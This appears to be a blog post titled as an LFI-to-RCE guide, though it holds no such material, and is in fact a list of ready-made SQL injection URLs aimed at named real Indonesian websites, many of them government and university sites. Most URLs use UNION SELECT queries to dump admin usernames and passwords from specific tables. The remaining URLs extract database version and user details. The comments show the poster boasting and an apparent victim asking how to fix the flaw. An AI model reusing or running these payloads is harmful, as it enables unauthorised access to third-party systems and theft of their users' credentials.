LFI to RCE via access_log injection

Indonesian Vuln Sites [ part three ]

http://www.rs-internasionalbintaro.com/profil.php?id=-3%20union%20select%201,2,3,4,5,group_concat(column_name),7,8,9,10,11,12,13,14,15,16,17,18,19%20from%20information_schema.columns%20where%20table_name=0x61646d696e--

http://www.ff.unair.ac.id/detail.profil.php?id=-130801629%20union%20select%201,2,3,4,5,group_concat(login,0x3a,pass),7,8,9%20from%20login--

http://binusbasketball.com/newsdetail.php?id=-8+union+select+concat_ws(0x3a,user,pass),2,3+from+tab_user--

http://www.export-jatim.or.id/profil.php?id=-467%20union%20select%201,version(),user(),database(),5,6,7,8,9,01,11,12,13,14,15,16,17,18,19,20,21,22,23,24--

http://www.surabayaflorist.com/tampildetail-prod.php?id=-289%20union%20select%201,2,3,4,group_concat(nama,0x3a,password),6,7,8%20from%20anggota--

http://www.alsofwah.or.id/index.php?pilih=lihatakhbar&id=-861%20union%20select%201,2,group_concat(user,0x3a,email,0x3a,password),4,5,6,7,8%20from%20user--

http://www.ecom.depkominfo.go.id/index.php?id=-178%20union%20select%201,group_concat(uname,0x3a,passwd),3,4%20from%20admin_users--

http://120.136.18.83/e-learning/article.php?id=-154%20union%20select%201,2,3,4,5,6,7,8,9,version(),11--

http://dinaskukm.jakarta.go.id/info.php?id=-5%20union%20select%201,2,3,4,5,group_concat(nama,0x3a,passw),7,8,9,10,11%20from%20ukmlogin/*

http://iib.diknas.go.id/info.php?id=-1%20union%20select%201,user(),database(),4,version(),6,7--

http://www.biocert.or.id/infoguide-info.php?id=-191%20union%20select%201,2,3,4,5,6,group_concat(username,0x3a,password),8,9,10%20from%20tb_user--

http://www.amarijogja.com/info/info.php?id=-8%20union%20select%201,database(),user(),version(),5--

http://www.terranet.or.id/conf.php?id=-1%20union%20select%201,2,group_concat(logname,0x3a,kunci),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%20from%20operator--

http://www.amirsyam.com/photos.php?id=-2%20union%20select%201,2,3,4,5,group_concat(User_Name,0x3a,Password),7,8%20from%20tblUser--

http://islamicvillage.net/stit/library/lib.php?id=-6%20union%20select%201,group_concat(USERNAME,0x3a,PASSWORD),3%20from%20tbl_user--

http://stikom.edu/v8/main.php?act=inf&goto=agd&id=-253%20union%20select%201,2,3,version(),5,6--

http://digilib.stikom.edu/id/detil.php?id=-221%20union%20select%201,2,3,4,5,6,7,8,version(),database(),11,user(),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34--

http://digilib.its.ac.id/detil.php?id=-2745%20union%20select%201,2,3,4,5,6,7,8,version(),database(),user(),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34--

http://www.banten.go.id/index.php?link=brt_dtl&id=-1112%20union%20select%201,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--

http://dpu.magelangkab.go.id/content.php?id=4%20union%20select%201,2,3,4,group_concat(username,0x3a,password),6,7,8,9,10,11%20from%20admins--

http://www.sokagallery.com/content.php?id=-64%20union%20select%201,2,group_concat(wu_username,0x3a,wu_password),4,5,6,7,8,9%20from%20web_user--

http://www.ppatk.go.id/content.php?s_sid=-58%20union%20select%201,2,3--

http://www.mcd.co.id/web/content.php?id=-21%20union%20select%201,2,3,version(),5,6,7,8--

http://pla.deptan.go.id/content.php?id=-2%20union%20select%201,2,version(),4,5,6--

http://www.kotekaonline.com/english/preview.php?id=-50%20union%20select%201,2,version(),4,user(),6,7,8--

http://www.belitungtimur.com/beltim1/format_news.php?id_news=-96%20union%20select%201,2,3,4,version(),6,7,8,user(),database(),11,12--

http://www.indonesiameetup.org/replytopost.php?id_post=-202%20union%20select%201,version()--


Comments

Anonymous said…
cakep om
evilc0de said…
gw emang cakep cuy.. lolz
untuk mengatasinya bagaimana ya? apakah ada saran/trik agar tidak vurnerable lagi?? matur nuwun karena sudah ditemukan hole di jaringan kami.
labatterie said…
matur nuwun karena sudah ditemukan hole di jaringan kami.